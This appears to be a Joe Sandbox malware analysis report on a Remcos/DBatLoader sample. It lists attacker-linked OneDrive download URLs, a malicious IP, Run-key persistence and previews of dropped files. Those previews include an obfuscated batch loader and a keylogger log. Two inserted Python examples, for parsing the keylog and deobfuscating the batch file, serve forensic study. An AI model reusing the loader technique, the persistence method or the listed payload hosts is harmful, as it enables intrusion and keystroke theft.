                                                                                            http://www.pmail.comSHEOrder-10524.exe, SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000000.1716894021.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000005.00000000.1778121431.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000006.00000000.1778301253.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 00000007.00000000.1778998992.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 0000000A.00000000.1881855840.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif, 0000000E.00000000.1938374574.0000000000416000.00000002.00000001.01000000.00000006.sdmp, lhgtogaW.pif.0.drfalse
                                                                                              high
                                                                                              https://bnaqzw.sn.files.1drv.com/Wagotghl.PIF, 00000008.00000003.1882438284.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://ocsp.sectigo.com0CSHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://onedrive.live.com/downloWagotghl.PIF, 0000000B.00000002.1949920072.0000000013C5D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://bnaqzw.sn.files.1drv.com/y4msc3kYI7yGn3gEL_3gJvdpmyEkhOCRDBRFk1eCCUOzN0wBjvROvE3UIu0RkWHiUluWagotghl.PIF, 0000000B.00000003.1938923041.0000000000651000.00000004.00000020.00020000.00000000.sdmp, Wagotghl.PIF, 0000000B.00000002.1940504493.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv1938.tmp.5.drfalse
                                                                                                      high
                                                                                                      http://www.ebuddy.comlhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
Contacted IP map legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
13.107.139.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
91.223.3.151 | unknown | Poland | 201814 | PL-SKYTECH-ASPL | true
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1431184
Start date and time:2024-04-24 17:03:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 11m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:SHEOrder-10524.exe
Detection:MAL
Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/12@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 116
• Number of non-executed functions: 230
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: SHEOrder-10524.exe
Time | Type | Description
16:04:03 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wagotghl C:\Users\Public\Wagotghl.url
16:04:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wagotghl C:\Users\Public\Wagotghl.url
17:03:56 | API Interceptor | 2x Sleep call for process: SHEOrder-10524.exe modified
17:04:14 | API Interceptor | 2x Sleep call for process: Wagotghl.PIF modified
17:04:35 | API Interceptor | 6745456x Sleep call for process: lhgtogaW.pif modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.107.139.11 | URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader |
13.107.139.11 | fu56fbrtn8.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | VdwJB2cS5l.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22) | malicious | HtmlDropper, HTMLPhisher |
13.107.139.11 | XY2I8rWLkM.exe | malicious | Remcos, DBatLoader |
13.107.139.11 | Signed Proforma Invoice 3645479_pdf.vbs | malicious | FormBook |
13.107.139.11 | ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
13.107.139.11 | 20240416-703661.cmd | malicious | DBatLoader |
13.107.139.11 | 20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine |
178.237.33.50 | UrgenteNotificationRef.cmd | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 107. PN-EN-1090-2+A1_2012P.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | OKhCyJ619J.rtf | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | fu56fbrtn8.exe | malicious | Remcos, DBatLoader | geoplugin.net/json.gp
178.237.33.50 | 1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | TcnD64eVFK.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | DHL Express Courier Pickup Confirmation CBJ231025122456.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Quotation.xls | malicious | Remcos | geoplugin.net/json.gp
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          dual-spov-0006.spov-msedge.netudVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.137.11
                                                                                                                          URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.137.11
                                                                                                                          fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.137.11
                                                                                                                          payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.137.11
                                                                                                                          VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.139.11
                                                                                                                          pSfqOmM1DG.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          • 13.107.137.11
                                                                                                                          https://1drv.ms/o/s!BDwGtOL3Ob0ShA6L6a7ghGOEVOBw?e=-nVgacgL8k2GcXGT6ejjHg&at=9%22)%20and%20ContentType:(%221%22)Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                          • 13.107.139.11
Match: geoplugin.net
UrgenteNotificationRef.cmd | malicious | Remcos | 178.237.33.50
107. PN-EN-1090-2+A1_2012P.exe | malicious | GuLoader, Remcos | 178.237.33.50
URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | 178.237.33.50
OKhCyJ619J.rtf | malicious | Remcos, DBatLoader | 178.237.33.50
fu56fbrtn8.exe | malicious | Remcos, DBatLoader | 178.237.33.50
1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | malicious | Remcos | 178.237.33.50
#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe | malicious | GuLoader, Remcos | 178.237.33.50
HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader | 178.237.33.50
TcnD64eVFK.exe | malicious | Remcos | 178.237.33.50
DHL Express Courier Pickup Confirmation CBJ231025122456.exe | malicious | Remcos | 178.237.33.50
Associated Sample Name / URL | Detection | Threat Name | Context
Match: ATOM86-ASATOM86NL
UrgenteNotificationRef.cmd | malicious | Remcos | 178.237.33.50
107. PN-EN-1090-2+A1_2012P.exe | malicious | GuLoader, Remcos | 178.237.33.50
URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | 178.237.33.50
OKhCyJ619J.rtf | malicious | Remcos, DBatLoader | 178.237.33.50
fu56fbrtn8.exe | malicious | Remcos, DBatLoader | 178.237.33.50
1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe | malicious | Remcos | 178.237.33.50
#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe | malicious | GuLoader, Remcos | 178.237.33.50
TcnD64eVFK.exe | malicious | Remcos | 178.237.33.50
DHL Express Courier Pickup Confirmation CBJ231025122456.exe | malicious | Remcos | 178.237.33.50
Quotation.xls | malicious | Remcos | 178.237.33.50
Match: PL-SKYTECH-ASPL
BitTorrent-7.6.exe | malicious | Unknown | 193.34.212.49
00kDn01FGP.elf | malicious | Mirai | 5.181.190.250
qkxofQCmKL.elf | malicious | Mirai | 5.181.190.250
CIzahLJ1XG.elf | malicious | Mirai | 5.181.190.250
0R5cMr3hYC.elf | malicious | Mirai | 5.181.190.250
pZRJrA9iek.elf | malicious | Mirai | 5.181.190.250
0uW9d2GGa8.elf | malicious | Mirai | 5.181.190.250
yDoGnvHHFD.elf | malicious | Mirai | 5.181.190.250
K7jJ48wtn7.elf | malicious | Mirai | 5.181.190.250
It9hKSRMYC.elf | malicious | Mirai | 5.181.190.250
Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
https://ken.fnh.temporary.site/wp-includes/sitemaps/update | malicious | Unknown | 13.107.213.69
uqGHhft2DO.elf | malicious | Mirai | 20.187.158.101
8dToMPcvO1.elf | malicious | Mirai | 20.240.232.227
Hs97Nxxy5u.elf | malicious | Mirai | 20.46.234.244
sBgS8t0K7i.elf | malicious | Mirai | 40.82.61.147
bUuAPqXmkL.elf | malicious | Mirai | 13.107.240.41
http://womenofgoodworks-my.sharepoint.com/:b:/g/personal/tia_womenofgoodworks_org/EVICmRtg-CVNtsngkb8KQlgBH2LYVfumjH5s-SFbeQjN_Q | malicious | HTMLPhisher | 52.104.141.55
FW_ FHAS Inc_ - Private and Confidential.msg | malicious | HtmlDropper, HTMLPhisher | 52.146.76.30
https://campaign-statistics.com/link_click/PJygYHTMZ2_OXDfP/30633247af9f78d20f1e067eab9a8276 | malicious | HTMLPhisher | 13.107.213.69
http://ustteam.com/ | malicious | Unknown | 13.107.246.69
Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 13.107.139.11
https://56hytuti5.weebly.com/ | malicious | Unknown | 13.107.139.11
udVh4Ist4Z.exe | malicious | Remcos, DBatLoader | 13.107.139.11
samradapps_datepicker_221114.xlam | malicious | Unknown | 13.107.139.11
Enquiry 230424.bat | malicious | Remcos, DBatLoader | 13.107.139.11
URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | 13.107.139.11
fu56fbrtn8.exe | malicious | Remcos, DBatLoader | 13.107.139.11
Payment MT103.xls | malicious | Unknown | 13.107.139.11
Ref_Order04.xls | malicious | Unknown | 13.107.139.11
FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 13.107.139.11
Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\Public\Libraries\easinvoker.exe
udVh4Ist4Z.exe | malicious | Remcos, DBatLoader
Enquiry 230424.bat | malicious | Remcos, DBatLoader
URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader
OKhCyJ619J.rtf | malicious | Remcos, DBatLoader
fu56fbrtn8.exe | malicious | Remcos, DBatLoader
FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
HFiHWvPsvA.rtf | malicious | Remcos, DBatLoader
payment swift.xls | malicious | Remcos, DBatLoader
VdwJB2cS5l.exe | malicious | Remcos, DBatLoader
SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe | malicious | Remcos, DBatLoader
Match: C:\Users\Public\Libraries\lhgtogaW.pif
udVh4Ist4Z.exe | malicious | Remcos, DBatLoader
FT. 40FE CNY .xlsx.lnk | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
disktop.pif.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
82__GT7568.PDF.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
SecuriteInfo.com.Win32.Evo-gen.25660.20544.exe | malicious | Remcos, DBatLoader
SecuriteInfo.com.Win32.Evo-gen.15258.6765.exe | malicious | Remcos, DBatLoader
rKjlbIeOH9.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
                                                                                                                                                                  Process:C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                  Entropy (8bit):3.30006269448478
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:6l+cl55YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6ltDec0WFe5BWFe5BW+
                                                                                                                                                                  MD5:53DB1EFBBAC14204981A07486A2CB165
                                                                                                                                                                  SHA1:8332E6022E28124110236AC1B3FDFDA06E785B2E
                                                                                                                                                                  SHA-256:B0D4853127F83C67C0A33E0D6F04CA01B7A0FB1ACBE78341C6F6501D994F7C45
                                                                                                                                                                  SHA-512:D8490D603A0AD4F44814E80781FD379D6CE1161FF2F8A1D684B5968E11621F7A27CA4AC5D662F218513200EC205C78B36ED37BB6C5BB35273DCA7A4AEC4D0A48
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Preview:....[.2.0.2.4./.0.4./.2.4. .1.7.:.0.4.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
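Added example (not part of the Joe Sandbox report): a small parser for the Remcos offline keylog format visible in the preview above. The preview shows UTF-16LE text with no BOM, so every "." is either the 0x00 high byte of a character or part of a CRLF pair; resolving them gives a session header, window-title lines in brackets and keystroke runs where special keys are also bracketed. The sample bytes below are constructed from that preview (the same three blocks, which also add up to the reported 288 bytes); treating a line that is exactly one bracketed token as a window title is an assumption made here, since a run consisting of a single special key would look the same.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed from the preview of C:\ProgramData\remcos\logs.dat above: the
# file is UTF-16LE text without a BOM, so each "." in the preview is either the
# high 0x00 byte of a character or part of a CRLF pair. Three blocks of the
# same shape give exactly the 288 bytes the report lists for the file.
SAMPLE_LOG = (
    "\r\n[2024/04/24 17:04:00 Offline Keylogger Started]\r\n\r\n"
    "[Program Manager]\r\n[Win]r\r\n[Run]\r\n\r\n"
    "[Program Manager]\r\n[Win]r\r\n[Run]\r\n\r\n"
    "[Program Manager]\r\n"
).encode("utf-16-le")


@dataclass
class Event:
    kind: str   # "session", "window" or "keys"
    text: str


SESSION_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
# Assumption: a line that is exactly one bracketed token is a foreground-window
# title; keystroke lines mix bracketed special keys with plain characters.
WINDOW_RE = re.compile(r"^\[[^\[\]]+\]$")
KEY_TOKEN_RE = re.compile(r"\[[^\]]+\]|.")


def decode_log(data: bytes) -> str:
    """Decode the UTF-16LE keylog, tolerating a BOM should a variant write one."""
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    return data.decode("utf-16-le", errors="replace")


def parse_log(data: bytes) -> List[Event]:
    """Split the log into session markers, window titles and keystroke runs."""
    events: List[Event] = []
    for line in decode_log(data).split("\r\n"):
        if not line:
            continue
        m = SESSION_RE.match(line)
        if m:
            events.append(Event("session", f"{m.group(1)} {m.group(2)}"))
        elif WINDOW_RE.match(line):
            events.append(Event("window", line[1:-1]))
        else:
            events.append(Event("keys", line))
    return events


def tokenize_keys(line: str) -> List[str]:
    """Split a keystroke run into special keys such as "[Win]" and plain characters."""
    return KEY_TOKEN_RE.findall(line)


def keystrokes_by_window(events: List[Event]) -> Dict[str, List[str]]:
    """Attribute each keystroke run to the most recent window title before it."""
    per_window: Dict[str, List[str]] = {}
    current = None
    for ev in events:
        if ev.kind == "window":
            current = ev.text
            per_window.setdefault(current, [])
        elif ev.kind == "keys" and current is not None:
            per_window[current].append(ev.text)
    return per_window


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for ev in events:
        print(f"{ev.kind:8} {ev.text}")
    print(keystrokes_by_window(events))
```

Read against the preview, the captured activity is Win+R pressed on the desktop ("Program Manager") followed by the Run dialog gaining focus, twice; on a real host the keystroke runs under each window title are what a forensic reviewer needs to reconstruct what was typed where.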
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3646
                                                                                                                                                                  Entropy (8bit):5.383959173452972
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
                                                                                                                                                                  MD5:71E46EFE9932B83B397B44052513FB49
                                                                                                                                                                  SHA1:741AF3B8C31095A0CC2C39C41E62279684913205
                                                                                                                                                                  SHA-256:11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
                                                                                                                                                                  SHA-512:76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/
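Added example (not part of the Joe Sandbox report): a single-pass %var% expander that undoes the string-splitting obfuscation used by the dropped batch file above, where one variable holds "set ", another holds "=", and every later line is assembled from fragments so the real commands only exist after cmd.exe expands them. The sample script below is constructed in that style with placeholder fragments; it is not the dropped file's content, which the preview only shows in part, and the hypothetical names `aaaa` through `gggg` and the `example.invalid` URL are this example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the style of the dropped batch file above. The
# fragment values are placeholders chosen for this example, not the dropped
# file's strings: "Nnqr" holds "set ", "njyC" holds "=", and each later
# assignment is built from those pieces before cmd.exe ever sees a "set".
SAMPLE_BAT = "\r\n".join([
    '@echo off',
    'set "Nnqr=set "',
    '%Nnqr%"njyC=="',
    '%Nnqr%"aaaa%njyC%rem "',
    '%Nnqr%"bbbb%njyC%http"',
    '%Nnqr%"cccc%njyC%s://"',
    '%Nnqr%"dddd%njyC%example.invalid/"',
    '%aaaa%%bbbb%%cccc%%dddd%',
    '%Nnqr%"eeee%njyC%echo "',
    '%Nnqr%"ffff%njyC%resolved"',
    r'%Nnqr%"gggg%njyC%C:\Users\Public\example.txt"',
    '%eeee%%ffff%',
    '%eeee%%gggg%',
])

VAR_RE = re.compile(r"%([^%\s]+)%")
# set "name=value" or set name=value; a closing quote, when present, ends the value
SET_RE = re.compile(r'^set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
IOC_RE = re.compile(r'https?://\S+|[A-Za-z]:\\[^\s"&|]+')


def expand(line: str, env: Dict[str, str]) -> str:
    """One left-to-right %var% pass, as cmd.exe does when parsing a batch line.
    Undefined names expand to nothing, which is batch-file (not prompt) behaviour."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), ""), line)


def deobfuscate(script: str) -> Tuple[Dict[str, str], List[str]]:
    """Emulate the assignments; return (final environment, resolved command lines)."""
    env: Dict[str, str] = {}
    resolved: List[str] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        expanded = expand(line, env)
        m = SET_RE.match(expanded.lstrip("@"))
        if m:
            env[m.group(1).lower()] = m.group(2)   # cmd variable names are case-insensitive
        else:
            resolved.append(expanded)
    return env, resolved


def indicators(resolved: List[str]) -> List[str]:
    """Pull URLs and Windows paths out of the resolved command lines."""
    return IOC_RE.findall(" ".join(resolved))


if __name__ == "__main__":
    env, cmds = deobfuscate(SAMPLE_BAT)
    for cmd in cmds:
        print(cmd)
    print(indicators(cmds))
```

To run this over the actual dropped file, read it as bytes and decode it as cp1252 before passing it to `deobfuscate`; batch files are ANSI text. The emulation only models plain %var% expansion, which is what this loader stage relies on: `call`-induced second expansion, delayed `!var!` expansion and `%%` escapes are not handled, so a script that uses them needs the corresponding rules added.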
                                                                                                                                                                  Process:C:\Users\user\Desktop\SHEOrder-10524.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                  Entropy (8bit):2.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Mov:Mov
                                                                                                                                                                  MD5:26EB5C462A98113BC43350C1D1A3A774
                                                                                                                                                                  SHA1:EC21267B15B6E5E580EF3051084E8F373037C2F9
                                                                                                                                                                  SHA-256:4593C89B4D60161D78FEF3F48312D7833649B876A0C1D762CB5B9D73ACAA0A20
SHA-512:5671CCE6F865BA2B7A2C5F493AA0BD1DA33FB70ED896A79A6702A65F66F2E997A4429C984EBC859FA7D13BE24E859B5CC54E6EBCF817CD47CBBE5A94DE876D73
Malicious:false
Preview:10..

Process:C:\Windows\SysWOW64\extrac32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1646592
Entropy (8bit):7.465739273228309
Encrypted:false
SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BPTQ+l04pEnlk8U2flxAu:NGup2B+K1mzyPTQh4psG2Z
MD5:439F6DB2ADB770A0F825879C91DA9904
SHA1:6B997F099E01BA06378A58115F65D515A22F5FB1
SHA-256:9EEF226FDB7D6C554CD552FC3F597EBFD6D77E33B95DB53F7A631A75ACF0C270
SHA-512:D3B5475EC41DF26581757656B38AE4C20367BCE638226B93C1AE2B890E0818C2CB1740FBF8B8108E244A5D5F48C78C0D0FA7FE382AA9FE321A3D696C6D5A30D3
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 47%

Process:C:\Users\user\Desktop\SHEOrder-10524.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
Category:dropped
Size (bytes):30026
Entropy (8bit):3.9380000056299878
Encrypted:false
SSDEEP:192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
MD5:828FFBF60677999579DAFE4BF3919C63
SHA1:A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
SHA-256:ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
SHA-512:BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
Malicious:false
Yara Hits:
• Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\WagotghlO.bat, Author: ditekSHen

Process:C:\Users\user\Desktop\SHEOrder-10524.exe
